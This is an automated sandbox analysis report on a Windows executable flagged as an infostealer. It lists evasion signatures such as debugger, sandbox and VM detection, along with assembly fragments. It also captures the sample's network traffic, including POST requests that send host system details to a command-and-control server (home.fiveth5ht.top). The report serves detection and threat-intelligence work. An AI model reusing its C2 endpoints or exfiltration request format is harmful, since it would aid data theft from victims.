Windows Analysis Report
mBr65h6L4w.exe

Overview

General Information

Sample name: mBr65h6L4w.exe
renamed because original name is a hash value
Original sample name: 46f2ce87ff70ecd81cef884655f82ea3.exe
Analysis ID: 1580956
MD5: 46f2ce87ff70ecd81cef884655f82ea3
SHA1: b236341be179023437f850df56b27dac08bb1a05
SHA256: b187942302acfc0c1ed1390b5554950f9a8da7fc6ef53f93b78de85ca0816e49
Tags: exeuser-abuse_ch
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Contains functionality to detect virtual machines (STR)
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: mBr65h6L4w.exe Avira: detected
Multi AV Scanner detection for submitted file
Source: mBr65h6L4w.exe ReversingLabs: Detection: 34%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: mBr65h6L4w.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: -----BEGIN PUBLIC KEY----- 1_2_009BDCF0
Source: mBr65h6L4w.exe Binary or memory string: -----BEGIN PUBLIC KEY-----
Contains functionality to create an SMB header
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: mov dword ptr [ebp+04h], 424D53FFh 1_2_009FA5B0
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: mov dword ptr [ebx+04h], 424D53FFh 1_2_009FA7F0
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: mov dword ptr [edi+04h], 424D53FFh 1_2_009FA7F0
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: mov dword ptr [esi+04h], 424D53FFh 1_2_009FA7F0
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: mov dword ptr [edi+04h], 424D53FFh 1_2_009FA7F0
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: mov dword ptr [esi+04h], 424D53FFh 1_2_009FA7F0
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: mov dword ptr [ebx+04h], 424D53FFh 1_2_009FA7F0
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: mov dword ptr [ebx+04h], 424D53FFh 1_2_009FB560
Uses 32bit PE files
Source: mBr65h6L4w.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_2_0099255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses, 1_2_0099255D
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_2_009929FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle, 1_2_009929FF
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global traffic HTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 560474Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 35 32 31 33 32 31 34 30 30 30 31 30 38 39 31 39 34 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 33 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 36 20 7d 2c 2
Source: global traffic HTTP traffic detected: GET /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 HTTP/1.1Host: home.fiveth5ht.topAccept: */*
Source: global traffic HTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 34.226.108.155 34.226.108.155
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_2_00A5A8C0 recvfrom, 1_2_00A5A8C0
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global traffic HTTP traffic detected: GET /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 HTTP/1.1Host: home.fiveth5ht.topAccept: */*
Source: global traffic DNS traffic detected: DNS query: httpbin.org
Source: global traffic DNS traffic detected: DNS query: home.fiveth5ht.top
Source: unknown HTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 560474Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 35 32 31 33 32 31 34 30 30 30 31 30 38 39 31 39 34 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 33 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 36 20 7d 2c 2
Source: global traffic HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Thu, 26 Dec 2024 13:14:28 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Thu, 26 Dec 2024 13:14:30 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: mBr65h6L4w.exe, 00000001.00000003.2211257540.0000000007930000.00000004.00001000.00020000.00000000.sdmp, mBr65h6L4w.exe, 00000001.00000002.2391817963.0000000000F01000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://.css
Source: mBr65h6L4w.exe, 00000001.00000003.2211257540.0000000007930000.00000004.00001000.00020000.00000000.sdmp, mBr65h6L4w.exe, 00000001.00000002.2391817963.0000000000F01000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://.jpg
Source: mBr65h6L4w.exe, 00000001.00000002.2394440960.0000000001CDB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://home.fiveth5ht.top/OyKvQ
Source: mBr65h6L4w.exe, 00000001.00000002.2391817963.0000000000F01000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17
Source: mBr65h6L4w.exe, 00000001.00000003.2355081522.0000000001C57000.00000004.00000020.00020000.00000000.sdmp, mBr65h6L4w.exe, 00000001.00000002.2391817963.0000000000F01000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
Source: mBr65h6L4w.exe, 00000001.00000002.2394189109.0000000001C64000.00000004.00000020.00020000.00000000.sdmp, mBr65h6L4w.exe, 00000001.00000003.2354382784.0000000001C63000.00000004.00000020.00020000.00000000.sdmp, mBr65h6L4w.exe, 00000001.00000003.2354136617.0000000001C62000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0
Source: mBr65h6L4w.exe, 00000001.00000002.2394189109.0000000001C64000.00000004.00000020.00020000.00000000.sdmp, mBr65h6L4w.exe, 00000001.00000003.2354382784.0000000001C63000.00000004.00000020.00020000.00000000.sdmp, mBr65h6L4w.exe, 00000001.00000003.2354136617.0000000001C62000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0i
Source: mBr65h6L4w.exe, 00000001.00000002.2394109920.0000000001C59000.00000004.00000020.00020000.00000000.sdmp, mBr65h6L4w.exe, 00000001.00000003.2355081522.0000000001C57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862T
Source: mBr65h6L4w.exe, 00000001.00000002.2391817963.0000000000F01000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS
Source: mBr65h6L4w.exe, 00000001.00000003.2211257540.0000000007930000.00000004.00001000.00020000.00000000.sdmp, mBr65h6L4w.exe, 00000001.00000002.2391817963.0000000000F01000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://html4/loose.dtd
Source: mBr65h6L4w.exe, 00000001.00000002.2391817963.0000000000F01000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: mBr65h6L4w.exe String found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: mBr65h6L4w.exe, 00000001.00000002.2391817963.0000000000F01000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://curl.se/docs/hsts.html
Source: mBr65h6L4w.exe String found in binary or memory: https://curl.se/docs/hsts.html#
Source: mBr65h6L4w.exe, mBr65h6L4w.exe, 00000001.00000003.2211257540.0000000007930000.00000004.00001000.00020000.00000000.sdmp, mBr65h6L4w.exe, 00000001.00000002.2391817963.0000000000F01000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: mBr65h6L4w.exe, 00000001.00000003.2211257540.0000000007930000.00000004.00001000.00020000.00000000.sdmp, mBr65h6L4w.exe, 00000001.00000002.2391817963.0000000000F01000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://httpbin.org/ip
Source: mBr65h6L4w.exe, 00000001.00000003.2211257540.0000000007930000.00000004.00001000.00020000.00000000.sdmp, mBr65h6L4w.exe, 00000001.00000002.2391817963.0000000000F01000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://httpbin.org/ipbefore
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443

System Summary
barindex
PE file contains section with special chars
Source: mBr65h6L4w.exe Static PE information: section name:
Source: mBr65h6L4w.exe Static PE information: section name: .idata
Source: mBr65h6L4w.exe Static PE information: section name:
Detected potential crypto function
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_3_01CC4E70 1_3_01CC4E70
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_3_01CC4E70 1_3_01CC4E70
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_3_01CC4E70 1_3_01CC4E70
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_3_01CC4E70 1_3_01CC4E70
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_3_01CC4E70 1_3_01CC4E70
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_3_01CC4E70 1_3_01CC4E70
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_3_01CC4E70 1_3_01CC4E70
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_3_01CC4E70 1_3_01CC4E70
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_3_01CC4E70 1_3_01CC4E70
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_3_01CC4E70 1_3_01CC4E70
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_3_01CC4E70 1_3_01CC4E70
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_3_01CC4E70 1_3_01CC4E70
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_2_009A05B0 1_2_009A05B0
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_2_009A6FA0 1_2_009A6FA0
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_2_00A5B180 1_2_00A5B180
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_2_009CF100 1_2_009CF100
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_2_00A600E0 1_2_00A600E0
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_2_00D1E050 1_2_00D1E050
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_2_00D1A000 1_2_00D1A000
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_2_009F6210 1_2_009F6210
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_2_00A5C320 1_2_00A5C320
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_2_00A60420 1_2_00A60420
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_2_00CE4410 1_2_00CE4410
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_2_0099E620 1_2_0099E620
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_2_00D14780 1_2_00D14780
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_2_009FA7F0 1_2_009FA7F0
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_2_00A5C770 1_2_00A5C770
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_2_00CF6730 1_2_00CF6730
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_2_00A4C900 1_2_00A4C900
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_2_009A4940 1_2_009A4940
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_2_0099A960 1_2_0099A960
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_2_00C4AAC0 1_2_00C4AAC0
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_2_00B66AC0 1_2_00B66AC0
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_2_00D08BF0 1_2_00D08BF0
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_2_0099CBB0 1_2_0099CBB0
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_2_00B24B60 1_2_00B24B60
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_2_00C4AB2C 1_2_00C4AB2C
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_2_00D1CC90 1_2_00D1CC90
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_2_00D0CD80 1_2_00D0CD80
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_2_00D14D40 1_2_00D14D40
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_2_00CAAE30 1_2_00CAAE30
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_2_00A5EF90 1_2_00A5EF90
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_2_00A58F90 1_2_00A58F90
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_2_00CE2F90 1_2_00CE2F90
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_2_009B4F70 1_2_009B4F70
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_2_009A10E6 1_2_009A10E6
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_2_00CFD430 1_2_00CFD430
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_2_00D035B0 1_2_00D035B0
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_2_00CE56D0 1_2_00CE56D0
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_2_00D217A0 1_2_00D217A0
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_2_00A49880 1_2_00A49880
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_2_00CE9920 1_2_00CE9920
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_2_00D13A70 1_2_00D13A70
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_2_00D01BD0 1_2_00D01BD0
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_2_009D1BE0 1_2_009D1BE0
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_2_00CF7CC0 1_2_00CF7CC0
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_2_00C49C80 1_2_00C49C80
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: String function: 009D5340 appears 45 times
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: String function: 00B6CBC0 appears 82 times
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: String function: 009973F0 appears 110 times
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: String function: 009D4F40 appears 309 times
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: String function: 009D4FD0 appears 247 times
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: String function: 0099C960 appears 32 times
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: String function: 009975A0 appears 641 times
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: String function: 00B47220 appears 87 times
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: String function: 009ACD40 appears 73 times
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: String function: 009ACCD0 appears 54 times
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: String function: 00A744A0 appears 68 times
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: String function: 009971E0 appears 47 times
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: String function: 0099CAA0 appears 62 times
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: String function: 009D50A0 appears 90 times
Uses 32bit PE files
Source: mBr65h6L4w.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
